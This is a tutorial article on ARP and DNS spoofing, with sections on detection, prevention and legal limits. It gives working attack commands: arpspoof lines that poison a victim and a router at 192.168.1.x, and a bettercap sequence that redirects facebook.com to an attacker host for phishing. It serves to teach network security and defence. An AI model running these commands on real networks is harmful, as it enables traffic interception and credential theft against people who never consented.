ARP and DNS Spoofing: A Deep Dive into Network Manipulation

1. Introduction

In the realm of cybersecurity, not all attacks are brute-force or overly complex. Sometimes, the most dangerous exploits come from the simplest manipulations of trust within a network. ARP and DNS spoofing are two such techniques, capable of hijacking traffic, redirecting users, or launching man-in-the-middle (MITM) attacks. This article dives deeply into these concepts, combining practical command-line examples, theoretical insights, and ethical warnings.

2. What is ARP Spoofing?

ARP (Address Resolution Protocol) spoofing is a technique used by attackers to associate their MAC address with the IP address of another device on the network. This form of attack allows the attacker to intercept, modify, or even stop data intended for another recipient.

Key Characteristics:

• Works on local area networks (LANs)
• Relies on the trust-based architecture of ARP
• Enables MITM attacks
• Can lead to session hijacking, data theft, or DoS

3. The ARP Protocol: A Quick Refresher

Before diving into how ARP spoofing works, it's essential to understand the ARP protocol:

• ARP maps IP addresses to MAC (Media Access Control) addresses.
• Every device on a LAN maintains an ARP cache, which stores IP-to-MAC mappings.
• If a device needs to communicate with another device, it sends a broadcast ARP request.
• The correct host replies with its MAC address.

The flaw? ARP doesn't verify responses. This makes spoofing easy.

4. Anatomy of an ARP Spoofing Attack

Imagine a typical network:

• Router IP: 192.168.1.1
• Victim IP: 192.168.1.10
• Attacker IP: 192.168.1.100

The attack consists of the following steps:

1. The attacker sends fake ARP replies to both the victim and the router.
2. The victim thinks the attacker is the router.
3. The router thinks the attacker is the victim.
4. All traffic now flows through the attacker's device.

This is known as a MITM position, perfect for sniffing or manipulating data.

 5. Tools of the Trade: arpspoof

arpspoof is part of the dsniff suite developed by Dug Song. It is a lightweight but powerful tool designed specifically for ARP cache poisoning.

Installing arpspoof

sudo apt install dsniff

Basic Syntax

arpspoof -i [interface] -t [target IP] [spoofed IP]

• -i eth0 specifies the interface.
• -t identifies the target device.
• The final IP is the one you are impersonating.

6. Step-by-Step: Conducting an ARP Spoofing Attack with arpspoof

Warning: This should only be done in a controlled lab environment.

Step 1: Enable IP Forwarding

To allow your machine to pass traffic between the victim and the router:

echo 1 > /proc/sys/net/ipv4/ip_forward

Step 2: Spoof the Victim

Let the victim believe that you are the router:

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

Step 3: Spoof the Router

Let the router believe that you are the victim:

arpspoof -i eth0 -t 192.168.1.1 192.168.1.10

At this point, you're in the middle. All traffic flows through you.

7. IP Forwarding: Why It's Critical

Without IP forwarding, the victim and router won’t communicate once traffic is redirected to your machine. You’ll essentially break the network.

To ensure uninterrupted communication, the Linux kernel must route the packets between interfaces.

Verify IP forwarding is enabled:

cat /proc/sys/net/ipv4/ip_forward

Disable it when done:

echo 0 > /proc/sys/net/ipv4/ip_forward

8. DNS Spoofing Explained

DNS spoofing is the process of falsifying DNS responses to redirect a target to a malicious or unintended destination.

Example: Instead of going to facebook.com, the user is redirected to a cloned page hosted by the attacker.

Why DNS Spoofing is Powerful

• Easy phishing setup
• Zero user interaction needed
• Bypasses SSL/TLS if done before certificate negotiation

9. The Role of Bettercap in DNS Spoofing

Bettercap is a powerful, modular, and flexible network attack and monitoring framework.

Starting Bettercap

sudo bettercap -iface eth0

Commands for DNS Spoofing

net.probe on
set arp.spoof.fullduplex true
set dns.spoof.address 192.168.1.100
set dns.spoof.domains facebook.com www.facebook.com
set arp.spoof.targets 192.168.1.10
dns.spoof on

Explanation:

• net.probe on: Detect live hosts.
• arp.spoof.fullduplex true: Spoof both ways.
• dns.spoof.address: The IP to redirect DNS queries to.
• dns.spoof.domains: Which domains to spoof.
• arp.spoof.targets: Target victim.

Result

When the victim tries to access facebook.com, they are sent to your malicious server instead.

10. Combining ARP and DNS Spoofing

Once you've positioned yourself using ARP spoofing, DNS spoofing is seamless. It allows you to control the victim’s web experience.

This is ideal for phishing, stealing credentials, or launching malware.

11. Real-World Scenarios

• Intercepting login credentials
• Redirecting to fake banking sites
• Installing malware via fake downloads
• Hijacking session cookies

12. Detection and Prevention

Detecting ARP Spoofing

• Inconsistent ARP cache entries
• Multiple MACs with the same IP
• Tools: arpwatch, XArp, Wireshark

Preventing ARP Spoofing

• Static ARP entries
• Switch port security (Cisco)
• Enable Dynamic ARP Inspection (DAI)
• Use VPNs and encrypted DNS (DoH/DoT)

13. Legal and Ethical Considerations

ARP and DNS spoofing can be extremely intrusive and are considered illegal when performed without explicit consent. Always limit testing to lab environments or with authorized penetration testing agreements.

• Unauthorized use:
• Violates laws (CFAA, GDPR, etc.)
• Can lead to criminal charges

14. Conclusion

ARP and DNS spoofing are both powerful and dangerous. Understanding them in-depth arms defenders with the knowledge to protect networks and gives ethical hackers tools for identifying weaknesses.

As with any potent tool, the power of these techniques lies in how responsibly they're wielded.